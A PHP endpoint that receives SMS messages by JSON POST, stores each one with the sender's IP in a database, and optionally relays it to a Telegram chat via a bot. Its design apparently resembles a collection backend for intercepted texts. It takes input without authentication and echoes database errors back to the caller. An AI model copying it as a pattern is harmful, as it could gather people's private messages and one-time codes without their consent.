<?php
// Include the database connection file
require_once 'database/database_connection.php'; // Ensure this path is correct

// Check if the POST request contains the necessary data
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Get the raw POST data
    $inputData = file_get_contents('php://input');
    
    // Decode the JSON data into an associative array
    $data = json_decode($inputData, true);
    
    // Check if the required keys are present in the data
    if (isset($data['sender_id']) && isset($data['message']) && isset($data['timestamp'])) {
        $senderId = $data['sender_id'];
        $message = $data['message'];
        $timestamp = date("Y-m-d H:i:s", intval($data['timestamp'] / 1000)); // Convert milliseconds to seconds

        // Get the user's IP address
        $userIp = $_SERVER['REMOTE_ADDR'];

        // Insert the data into the database
        try {
            $stmt = $conn->prepare("INSERT INTO sms (sender_id, message, timestamp, ip_address) VALUES (?, ?, ?, ?)");
            $stmt->bind_param("ssss", $senderId, $message, $timestamp, $userIp); // Bind parameters
            $stmt->execute();
            
            // Read the config file (json/data.json)
            $config = json_decode(file_get_contents('json/data.json'), true);
            
            // Check if Telegram integration is enabled (tg = true)
            if (isset($config['tg']) && $config['tg'] === true) {
                $botToken = $config['bot_token'];
                $chatId = $config['user_id'];

                // Send the SMS message to Telegram
                $telegramApiUrl = "https://api.telegram.org/bot$botToken/sendMessage";
                $postData = [
                    'chat_id' => $chatId,
                    'text' => "Sender ID: $senderId\nMessage: $message\nTimestamp: $timestamp\nIP Address: $userIp"
                ];

                // Send the request to Telegram API
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_URL, $telegramApiUrl);
                curl_setopt($ch, CURLOPT_POST, true);
                curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                $response = curl_exec($ch);
                curl_close($ch);
                
                // Optionally handle the response from Telegram API
                if ($response === false) {
                    echo json_encode(["status" => "error", "message" => "Failed to send message to Telegram."]);
                    return;
                }
            }
            
            // Send a success response
            echo json_encode(["status" => "success", "message" => "Data logged successfully."]);
        } catch (mysqli_sql_exception $e) {
            echo json_encode(["status" => "error", "message" => "Failed to log data: " . $e->getMessage()]);
        }
    } else {
        // If the required fields are missing, return an error
        echo json_encode(["status" => "error", "message" => "Missing required data."]);
    }
} else {
    // If it's not a POST request, return an error
    echo json_encode(["status" => "error", "message" => "Invalid request method."]);
}
?>
